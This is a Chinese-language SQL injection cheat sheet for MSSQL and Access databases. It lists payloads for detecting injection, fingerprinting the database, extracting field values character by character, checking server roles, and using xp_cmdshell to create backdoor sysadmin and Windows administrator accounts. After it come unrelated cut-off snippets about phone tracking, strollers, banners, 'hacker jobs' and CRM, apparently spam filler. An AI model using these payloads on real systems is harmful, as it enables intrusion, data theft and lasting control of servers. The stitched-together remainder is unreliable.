1.判断是否有注入
;and 1=1
;and 1=2
2.初步判断是否是mssql
;and user>0
3.注入参数是字符
'and [查询条件] and ''='
4.搜索时没过滤参数的
'and [查询条件] and '%25'='
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜数据库
;and (Select Count(*) from [数据库名])>0
7.猜字段
;and (Select Count(字段名) from 数据库名)>0
8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(Select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(Select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(Select IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
怎么输入另一方手机马上精准定位(手机位置完全免费一次) 不可以,没有办法依据语音聊天定位位置。仅有公安部门侦查行政单位和电气设备企业有分配权查寻到,本人是无法进行的并且违规。怎样定位别人的手机1...
选择一款好的婴儿推车需要从重量,颜值,舒适度,功能,安全等多方面来考量,威凯宝宝推车有着超高的性价比和功能,相信大家会喜欢,那么威凯宝宝推车怎么样?下面友谊长存带来介绍。 威凯宝宝推车使用评测 1...
易拉宝:或称海报架、展示架,是树立式宣传海报,常见于人流多的街头通道,协助个体户式的路演推销活动,或是临时摊位。 易拉宝的替代品是街头横额、刀旗、海报、贴纸等。 易拉宝的构造是一个座地的卷轴,由地...
一、怎么才能做一个电脑黑客接单流程 1、黑客接单由于这个原因,今天的黑客文化主要集中在Unix上。怎么才能做一个电脑手机系统软件下载当世界上还有其他有趣的问题需要解决时,他们不应该被浪费在重新发明的车...
crm系统是什么(快速理解什么是CRM系统)CRM系统,是Customer Relationship Management 的简称,其中文名称为“客户关系管理”。...
怎么同步聊天记录到电脑_怎么同步聊天背景 2018年11月15-16日,由河北省工业和信息化厅、张家口人民政府、中国电动汽车百人会主办,张家口市工业和信息化局承办的主题为“协同发展推动能源革命”的第...